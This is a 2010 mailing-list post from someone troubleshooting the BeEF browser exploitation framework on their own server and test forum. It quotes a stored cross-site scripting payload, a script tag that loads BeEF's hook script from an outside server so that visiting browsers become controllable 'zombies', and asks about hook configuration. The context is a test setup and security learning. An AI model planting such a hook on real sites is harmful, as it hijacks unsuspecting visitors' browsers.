[WEB SECURITY] beef question

Alex Fiuvertiz fiuvertiz at gmail.com
Tue Jun 15 09:20:48 EDT 2010

This is what I meant:
www.example.com/beef/ is pointing to my own server at home.
When I use a browser to connect (from Internet) to the provided
hook-example: http://www.example.com/beef/hook/xss-example.htm it
works perfectly.

But if I try to set <script
src="http://www.example.com/beef/hook/beefmagic.js.php"></script> in
as a persistent post in a test forum the zombie doesn't show up
(instructions from owasp).

Can I have entered a false value in the Configuration page of beef?
The page states:
Connection (IP Address or URL)
This is the location that the zombies will connect to (do not include
the hook directory). This must match the 'ServerName' value in your
http.conf for the modules to work.
This is where I fill out the value of
http://www.example.com/beef

I have chowned the complete directory structure with the web server
user and as a desperate thing I also tried to chown the whole
directory to 777. Still no success.

It seems like every example that I found on the web is configuring the
beef with an internal IP (192.168.*.*/10.*.*.*).
No one is showing a working example of public domain address.

My server is doing virtual hosting.

/ Alex